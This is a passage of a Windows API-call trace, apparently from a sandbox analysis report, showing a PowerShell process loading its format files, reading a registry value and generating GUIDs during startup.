	[0335.402] CoTaskMemFree (pv=0x1b8ff500) 
	[0335.402] RegCloseKey (hKey=0x308) returned 0x0
	[0335.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0335.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0335.820] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x50f02078, Data2=0x6e2b, Data3=0x48f0, Data4=([0]=0x81, [1]=0x69, [2]=0x83, [3]=0x58, [4]=0xfd, [5]=0x8b, [6]=0x76, [7]=0xc9))) returned 0x0
	[0335.820] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x48c0650f, Data2=0x2d0d, Data3=0x4449, Data4=([0]=0xbe, [1]=0x79, [2]=0xcb, [3]=0xb2, [4]=0xf2, [5]=0x0, [6]=0xc, [7]=0xc5))) returned 0x0
	[0335.820] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x1d943293, Data2=0xb67, Data3=0x40be, Data4=([0]=0x9f, [1]=0x78, [2]=0x13, [3]=0x2, [4]=0x6e, [5]=0x35, [6]=0x38, [7]=0x7b))) returned 0x0
	[0335.821] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x90ab8ead, Data2=0x754a, Data3=0x4729, Data4=([0]=0xac, [1]=0x18, [2]=0x3e, [3]=0x9, [4]=0x3e, [5]=0xd1, [6]=0x11, [7]=0xc))) returned 0x0
	[0335.821] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xebeef1b5, Data2=0x8e2c, Data3=0x4f50, Data4=([0]=0xa5, [1]=0x5c, [2]=0x19, [3]=0x12, [4]=0xe6, [5]=0x1a, [6]=0xc, [7]=0xcd))) returned 0x0
	[0335.821] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xbfb98f, Data2=0x8ebf, Data3=0x4b96, Data4=([0]=0x84, [1]=0x6c, [2]=0x61, [3]=0x47, [4]=0xce, [5]=0x1c, [6]=0x8c, [7]=0x28))) returned 0x0
	[0335.821] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.821] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2904e885, Data2=0xc03d, Data3=0x4395, Data4=([0]=0xa0, [1]=0x8e, [2]=0xf0, [3]=0x5, [4]=0xc4, [5]=0x55, [6]=0x40, [7]=0xcb))) returned 0x0
	[0335.821] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.822] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.822] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4e0d0051, Data2=0xc9bf, Data3=0x487b, Data4=([0]=0xb2, [1]=0xd0, [2]=0x26, [3]=0x49, [4]=0x51, [5]=0x88, [6]=0x2f, [7]=0xc3))) returned 0x0
	[0335.822] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa8b66533, Data2=0x5d98, Data3=0x4975, Data4=([0]=0x82, [1]=0x33, [2]=0xf0, [3]=0xbe, [4]=0xbe, [5]=0x8b, [6]=0xca, [7]=0x32))) returned 0x0
	[0335.822] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x1ae8fbbd, Data2=0x388e, Data3=0x4abd, Data4=([0]=0xaa, [1]=0x9b, [2]=0x73, [3]=0x68, [4]=0x17, [5]=0x62, [6]=0x38, [7]=0xb7))) returned 0x0
	[0335.822] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xcd4b3b47, Data2=0xb3ad, Data3=0x4fde, Data4=([0]=0xa8, [1]=0xc5, [2]=0x73, [3]=0xe0, [4]=0x51, [5]=0x2f, [6]=0x28, [7]=0x2a))) returned 0x0
	[0335.822] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xdc0b807e, Data2=0xfb85, Data3=0x426c, Data4=([0]=0x90, [1]=0xd1, [2]=0x76, [3]=0x4c, [4]=0xb4, [5]=0x47, [6]=0x25, [7]=0xf))) returned 0x0
	[0335.823] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0335.823] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4c2f418f, Data2=0x2731, Data3=0x496f, Data4=([0]=0xbc, [1]=0xe0, [2]=0xbd, [3]=0xc9, [4]=0x69, [5]=0x27, [6]=0xb5, [7]=0xdd))) returned 0x0
	[0335.823] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x40ee24cb, Data2=0x125a, Data3=0x43bc, Data4=([0]=0xbf, [1]=0xc0, [2]=0xae, [3]=0x22, [4]=0x40, [5]=0x2f, [6]=0x4, [7]=0xcb))) returned 0x0
	[0335.824] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x5741ff15, Data2=0x945e, Data3=0x4344, Data4=([0]=0x91, [1]=0x6b, [2]=0x9d, [3]=0x63, [4]=0xa4, [5]=0x77, [6]=0xc7, [7]=0x5a))) returned 0x0
	[0335.824] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xf378828, Data2=0xcc07, Data3=0x4344, Data4=([0]=0xa1, [1]=0xea, [2]=0x6, [3]=0x87, [4]=0x6c, [5]=0x81, [6]=0xa, [7]=0xca))) returned 0x0
	[0335.824] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc98c2ae8, Data2=0xc746, Data3=0x425a, Data4=([0]=0x98, [1]=0xd6, [2]=0xc0, [3]=0xda, [4]=0x4a, [5]=0x2, [6]=0xf7, [7]=0xfd))) returned 0x0
	[0335.824] VirtualQuery (in: lpAddress=0x26bde0, lpBuffer=0x26cca0, dwLength=0x30 | out: lpBuffer=0x26cca0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.824] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x7187c36b, Data2=0xd5b8, Data3=0x4df0, Data4=([0]=0x9d, [1]=0x14, [2]=0x7, [3]=0xd1, [4]=0xc7, [5]=0x70, [6]=0xc7, [7]=0x53))) returned 0x0
	[0335.824] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x83f7a420, Data2=0x203d, Data3=0x48d0, Data4=([0]=0x96, [1]=0xe, [2]=0x1c, [3]=0x21, [4]=0xe3, [5]=0x84, [6]=0x81, [7]=0x38))) returned 0x0
	[0335.825] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd75dc865, Data2=0xeb3e, Data3=0x4137, Data4=([0]=0xac, [1]=0x3a, [2]=0x5, [3]=0xe5, [4]=0xd, [5]=0x45, [6]=0x45, [7]=0xe9))) returned 0x0
	[0335.825] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xb6632e2f, Data2=0xcac1, Data3=0x44ed, Data4=([0]=0x82, [1]=0x97, [2]=0x39, [3]=0xd6, [4]=0x32, [5]=0x4d, [6]=0x17, [7]=0x3b))) returned 0x0
	[0335.825] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4dc3ffc9, Data2=0xbe66, Data3=0x4e42, Data4=([0]=0x8e, [1]=0xfc, [2]=0x80, [3]=0xeb, [4]=0xe1, [5]=0x91, [6]=0xab, [7]=0xdf))) returned 0x0
	[0335.825] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x7d6396aa, Data2=0xe625, Data3=0x472a, Data4=([0]=0x8a, [1]=0xcc, [2]=0xfb, [3]=0x99, [4]=0xde, [5]=0x25, [6]=0x69, [7]=0xf5))) returned 0x0
	[0335.825] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xda8bd58d, Data2=0xb3ac, Data3=0x4a5d, Data4=([0]=0x8e, [1]=0x9a, [2]=0x30, [3]=0xdd, [4]=0xcd, [5]=0x13, [6]=0xac, [7]=0x4b))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xeca46e94, Data2=0xb5f2, Data3=0x4d8a, Data4=([0]=0x94, [1]=0xa1, [2]=0x69, [3]=0x42, [4]=0xae, [5]=0x73, [6]=0x7e, [7]=0xfc))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xbf133b94, Data2=0x88fa, Data3=0x4a9f, Data4=([0]=0xad, [1]=0xdd, [2]=0xa6, [3]=0x9e, [4]=0xbe, [5]=0xe6, [6]=0xce, [7]=0xfb))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xbb2d7c57, Data2=0x76f1, Data3=0x43ee, Data4=([0]=0xbc, [1]=0x14, [2]=0xe7, [3]=0x53, [4]=0xac, [5]=0x48, [6]=0xcc, [7]=0xd9))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xcdbe6032, Data2=0x71df, Data3=0x41a6, Data4=([0]=0xb2, [1]=0xcd, [2]=0x53, [3]=0x4d, [4]=0x39, [5]=0xaf, [6]=0x40, [7]=0xd2))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x8f73ff7f, Data2=0xc69, Data3=0x4031, Data4=([0]=0x85, [1]=0x51, [2]=0x74, [3]=0x32, [4]=0xd6, [5]=0xd0, [6]=0x7, [7]=0xe6))) returned 0x0
	[0335.826] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xa70a271, Data2=0x97c, Data3=0x481d, Data4=([0]=0xa0, [1]=0x79, [2]=0xcd, [3]=0x8c, [4]=0x83, [5]=0xe9, [6]=0x7f, [7]=0x8a))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x44e0dc15, Data2=0xd575, Data3=0x415f, Data4=([0]=0xaf, [1]=0x7e, [2]=0xd1, [3]=0xa2, [4]=0xb0, [5]=0xa3, [6]=0x7c, [7]=0xd8))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd53119cd, Data2=0x4612, Data3=0x49f7, Data4=([0]=0x89, [1]=0x90, [2]=0xa2, [3]=0xfe, [4]=0x61, [5]=0x33, [6]=0x82, [7]=0xb))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xc7e0734d, Data2=0xd937, Data3=0x4d12, Data4=([0]=0xac, [1]=0x80, [2]=0x8b, [3]=0x78, [4]=0x94, [5]=0x73, [6]=0xb2, [7]=0xc8))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2604603a, Data2=0xfede, Data3=0x4792, Data4=([0]=0xa7, [1]=0xe0, [2]=0x57, [3]=0x68, [4]=0x21, [5]=0x2, [6]=0x4d, [7]=0xe0))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x38574436, Data2=0x5a1c, Data3=0x42ed, Data4=([0]=0x98, [1]=0x55, [2]=0x7c, [3]=0x32, [4]=0x31, [5]=0x9c, [6]=0xb1, [7]=0x56))) returned 0x0
	[0335.827] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x4806c0a, Data2=0x5e70, Data3=0x4914, Data4=([0]=0xb0, [1]=0xbc, [2]=0x7f, [3]=0xe0, [4]=0x57, [5]=0x57, [6]=0xb2, [7]=0x8b))) returned 0x0
	[0335.828] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.828] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.828] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.828] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x2b767b19, Data2=0x28c7, Data3=0x4500, Data4=([0]=0x82, [1]=0xf1, [2]=0x3a, [3]=0xe1, [4]=0xae, [5]=0x96, [6]=0x28, [7]=0xaf))) returned 0x0
	[0335.829] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0335.829] SetErrorMode (uMode=0x1) returned 0x1
	[0335.829] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0335.829] GetFileType (hFile=0x304) returned 0x1
	[0335.829] SetErrorMode (uMode=0x1) returned 0x1
	[0335.829] GetFileType (hFile=0x304) returned 0x1
	[0335.829] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.830] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.830] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.830] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.830] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.831] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.831] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x119, lpOverlapped=0x0) returned 1
	[0335.831] ReadFile (in: hFile=0x304, lpBuffer=0x2ef2a90, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2ef2a90*, lpNumberOfBytesRead=0x26ceb8*=0x0, lpOverlapped=0x0) returned 1
	[0335.831] CloseHandle (hObject=0x304) returned 1
	[0335.831] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cc00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0335.831] SetErrorMode (uMode=0x1) returned 0x1
	[0335.831] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x26ce60 | out: lpFileInformation=0x26ce60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0335.832] SetErrorMode (uMode=0x1) returned 0x1
	[0335.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0335.832] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26cf48 | out: phkResult=0x26cf48*=0x304) returned 0x0
	[0335.832] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26cecc, lpData=0x0, lpcbData=0x26cec8*=0x0 | out: lpType=0x26cecc*=0x1, lpData=0x0, lpcbData=0x26cec8*=0x56) returned 0x0
	[0335.832] CoTaskMemAlloc (cb=0x5a) returned 0x184950
	[0335.832] RegQueryValueExW (in: hKey=0x304, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26ce9c, lpData=0x184950, lpcbData=0x26ce98*=0x56 | out: lpType=0x26ce9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26ce98*=0x56) returned 0x0
	[0335.832] CoTaskMemFree (pv=0x184950) 
	[0335.832] RegCloseKey (hKey=0x304) returned 0x0
	[0335.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26cb90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0335.832] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26ca40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0335.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.833] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c420, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0335.833] VirtualQuery (in: lpAddress=0x26b9e0, lpBuffer=0x26c8a0, dwLength=0x30 | out: lpBuffer=0x26c8a0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.833] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x876f93de, Data2=0x3c74, Data3=0x4c89, Data4=([0]=0x89, [1]=0x64, [2]=0x71, [3]=0x96, [4]=0x54, [5]=0xd3, [6]=0xdd, [7]=0x13))) returned 0x0
	[0335.834] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.834] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x8e0c4f93, Data2=0x99fb, Data3=0x4e4f, Data4=([0]=0x93, [1]=0x16, [2]=0xc3, [3]=0x42, [4]=0xee, [5]=0x45, [6]=0xad, [7]=0x24))) returned 0x0
	[0335.834] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0xd967585b, Data2=0x7a66, Data3=0x4c79, Data4=([0]=0xac, [1]=0xc5, [2]=0x17, [3]=0x26, [4]=0x91, [5]=0x9e, [6]=0xc0, [7]=0x12))) returned 0x0
	[0335.834] CoCreateGuid (in: pguid=0x26d170 | out: pguid=0x26d170*(Data1=0x7c448fbd, Data2=0xc8cb, Data3=0x4f1a, Data4=([0]=0xae, [1]=0x4, [2]=0x78, [3]=0xbf, [4]=0xb1, [5]=0xf5, [6]=0xf9, [7]=0xe4))) returned 0x0
	[0335.834] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.834] VirtualQuery (in: lpAddress=0x26bb20, lpBuffer=0x26c9e0, dwLength=0x30 | out: lpBuffer=0x26c9e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0335.835] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x26c930, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0335.835] SetErrorMode (uMode=0x1) returned 0x1
	[0335.835] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x304
	[0335.835] GetFileType (hFile=0x304) returned 0x1
	[0335.835] SetErrorMode (uMode=0x1) returned 0x1
	[0335.835] GetFileType (hFile=0x304) returned 0x1
	[0335.835] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.836] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.836] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
	[0335.836] ReadFile (in: hFile=0x304, lpBuffer=0x2f4ec30, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26ceb8, lpOverlapped=0x0 | out: lpBuffer=0x2f4ec30*, lpNumberOfBytesRead=0x26ceb8*=0x1000, lpOverlapped=0x0) returned 1
